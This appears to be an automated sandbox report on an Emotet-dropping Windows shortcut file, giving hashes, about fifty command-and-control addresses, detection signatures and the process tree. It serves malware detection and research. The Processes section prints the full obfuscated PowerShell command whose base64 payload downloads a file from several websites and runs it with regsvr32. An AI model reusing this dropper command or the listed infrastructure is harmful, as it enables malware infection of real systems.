Analysis
-
max time kernel
90s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
27-05-2022 08:37
Static task
static1
Behavioral task
behavioral1
Sample
44-76912499472.lnk
Resource
win7-20220414-en
General
-
Target
44-76912499472.lnk
-
Size
3KB
-
MD5
afa789a5a4197b43071da4d94067d346
-
SHA1
f5ef0b10c608fb042edae39919903b4c7510d49b
-
SHA256
9e90586b5881001bffc59e5ab90808e1470b787e1095052602cece861c0648d6
-
SHA512
2e5d94eb4d8d9fefe0dae56a7384673ae4f08ae1dc3f14bd63a01ca933689d555629b6b7acacb1b40a7ed0839ba99f9ce5f5e0791bdb09cb50b6dcb198a88808
Malware Config
Extracted
emotet
Epoch5
194.9.172.107:8080
66.42.57.149:443
165.22.73.229:8080
202.29.239.162:443
104.248.225.227:8080
54.38.242.185:443
103.133.214.242:8080
78.47.204.80:443
210.57.209.142:8080
103.41.204.169:8080
118.98.72.86:443
88.217.172.165:8080
87.106.97.83:7080
85.25.120.45:8080
195.77.239.39:8080
37.44.244.177:8080
36.67.23.59:443
160.16.143.191:7080
54.38.143.246:7080
159.69.237.188:443
68.183.93.250:443
54.37.228.122:443
190.90.233.66:443
37.59.209.141:8080
178.62.112.199:8080
59.148.253.194:443
196.44.98.190:8080
202.28.34.99:8080
78.46.73.125:443
51.68.141.164:8080
207.148.81.119:8080
93.104.209.107:8080
185.148.168.220:8080
103.85.95.4:8080
62.171.178.147:8080
175.126.176.79:8080
134.122.119.23:8080
202.134.4.210:7080
116.124.128.206:8080
45.71.195.104:8080
110.235.83.107:7080
103.56.149.105:8080
68.183.91.111:8080
5.56.132.177:8080
195.154.146.35:443
217.182.143.207:443
54.37.106.167:8080
85.214.67.203:8080
188.225.32.231:4143
103.42.58.120:7080
139.196.72.155:8080
Signatures
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 8 4136 powershell.exe 14 4136 powershell.exe 15 4136 powershell.exe 17 4136 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 3524 regsvr32.exe 1316 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeregsvr32.exepid process 4136 powershell.exe 4136 powershell.exe 1316 regsvr32.exe 1316 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4136 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.execmd.exepowershell.exeregsvr32.exedescription pid process target process PID 4664 wrote to memory of 3300 4664 cmd.exe cmd.exe PID 4664 wrote to memory of 3300 4664 cmd.exe cmd.exe PID 3300 wrote to memory of 4136 3300 cmd.exe powershell.exe PID 3300 wrote to memory of 4136 3300 cmd.exe powershell.exe PID 4136 wrote to memory of 3524 4136 powershell.exe regsvr32.exe PID 4136 wrote to memory of 3524 4136 powershell.exe regsvr32.exe PID 3524 wrote to memory of 1316 3524 regsvr32.exe regsvr32.exe PID 3524 wrote to memory of 1316 3524 regsvr32.exe regsvr32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\44-76912499472.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v:on /c XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||p^owershell.^e^xe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\wwmAtO\gdGDIRqlWg.qcQ4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\WcouDSMTFUfJ\RNUIcFORsDL.dll"5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\wwmAtO\gdGDIRqlWg.qcQFilesize
402KB
MD53747cf33856720d326964080824a674c
SHA1c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da
SHA2562a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48
SHA5123a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec
-
C:\Users\Admin\AppData\Local\wwmAtO\gdGDIRqlWg.qcQFilesize
402KB
MD53747cf33856720d326964080824a674c
SHA1c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da
SHA2562a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48
SHA5123a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec
-
C:\Windows\System32\WcouDSMTFUfJ\RNUIcFORsDL.dllFilesize
402KB
MD53747cf33856720d326964080824a674c
SHA1c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da
SHA2562a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48
SHA5123a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec
-
memory/1316-141-0x0000000000000000-mapping.dmp
-
memory/3300-130-0x0000000000000000-mapping.dmp
-
memory/3524-135-0x0000000000000000-mapping.dmp
-
memory/3524-138-0x0000000180000000-0x0000000180031000-memory.dmpFilesize
196KB
-
memory/4136-131-0x0000000000000000-mapping.dmp
-
memory/4136-132-0x000001E326880000-0x000001E3268A2000-memory.dmpFilesize
136KB
-
memory/4136-133-0x00007FFD46420000-0x00007FFD46EE1000-memory.dmpFilesize
10.8MB
-
memory/4136-134-0x000001E3274E0000-0x000001E327C86000-memory.dmpFilesize
7.6MB